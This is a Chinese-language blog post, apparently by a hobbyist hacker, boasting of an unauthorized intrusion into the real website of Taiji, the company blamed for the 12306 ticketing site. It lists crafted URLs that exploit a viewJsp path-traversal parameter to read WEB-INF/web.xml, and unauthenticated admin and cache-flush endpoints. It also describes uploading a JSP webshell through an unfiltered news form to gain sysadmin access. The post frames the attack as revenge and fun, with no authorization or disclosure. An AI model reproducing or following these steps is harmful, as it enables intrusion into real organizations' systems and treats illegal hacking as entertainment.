国庆就要来了,返乡出行的高峰期来了,最近无论是身边还是网络上的都怨声载道啊,原因就是火车票,网上订票系统12306真是没话说了,大家都懂的!
于是最近大家都把气撒在了收1.99亿开发出这么个破网站的公司:“太极”身上,主页http://www.taiji.com.cn/
下面我就把过程写出来和大家分享。
打开主页的网址默认跳到了这个链接
http://www.taiji.com.cn/coboportal/portal/compayindex.ptview
鼠标随便停在新闻链接上状态栏显示如下,
http://www.taiji.com.cn/coboportal/portal/itservice.ptview?funcid=showGSWZInfoLink&infoSortId=52802&infoLinkId=13962&viewJsp=gswz/newsevents/newsshowcontent.jsp
试了试infoSortId=52802这里是木有注入的哦,不过看着viewjsp这个参数有点特别哦,后面直接接上相对路径真是jsp文件地址了,于是我们来试试包含漏洞或者任意文件下载漏洞~
构造如下地址:
http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=index.jsp
打开发现404如图:
继续构造,把viewJsp=index.jsp改为viewJsp=../index.jsp:
http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869%20&viewJsp=../index.jsp
依然是404
继续~
出来了个这个网页,这好像是个灰常低调的菜单导航,上面有后台的地址链接,还有清空系统缓存等功能
随便点点后台如图
又是404
http://www.taiji.com.cn/coboportal/portal/wafplatform/portletmanage.do?funcid=flushSessinoOsCache
去掉了/portal/wafplatform这两个目录也是打不开的,于是试到这的时候也是上面那个菜单导航
http://www.taiji.com.cn/coboportal/
这下可以直接点了到后台了
也可以清空缓存:
注意到地址如下
http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushAllOsCache
http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushSessinoOsCache
http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=reloadCache
http://www.taiji.com.cn/coboportal/wafplatform/portalpagemanage.do?funcid=reloadCache
到这里我直接去试着弱口令登录后台了,不行!注入、万能密码什么的也过滤了的~
看来思路到这里就死了,
又随便试了下包含漏洞读取java 网站的配置文件web.xml看能不能读取出点什么
http://www.taiji.com.cn/coboportal/portal/innovation.ptview?funcid=showGSWZInfoLink&infoSortId=53921&infoLinkId=13869 &viewJsp=../../WEB-INF/web.xml
除了个内网IP敏感点其他没什么鸟信息可以利用``肿么办呢,于是先放一放 休息会咯
又翻啊翻,看网页源文件的时候找到个链接~
www.taiji.com.cn/coboportal/portal/portlet/gswz/iframediv.html
是敏感点 依然没什么用!
晚上的时候群里的兄弟们也讨论起这个站,这个好,终于找到基友了,但是根据截图来看他们已经进了后台了,我还在后台门口傻望着呢,肿么办呢,就去请教了下大牛,经过我的软磨硬泡嘘寒问暖关怀备至一番,原来大牛们在清空缓存那儿的链接直接就可以进去的!
怎么进呢,清空缓存的链接是http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do?funcid=flushAllOsCache
去掉?后面的参数http://www.taiji.com.cn/coboportal/wafplatform/portletmanage.do打开了直接就是后台,没有验证的,惭愧啊,我都不好意思直视大牛的双眼!
真是坑爹啊,难怪做出来的12306.cn风格都是一个样,就是坑爹!
进了后台随便找个添加新闻的上传个jsp,没过滤滴!这样就拿到大马了,sysadmin权限~
接下来的提权内网渗透就不玩了,小小滴娱乐一下就算了,剩下的还是留给大牛们玩去··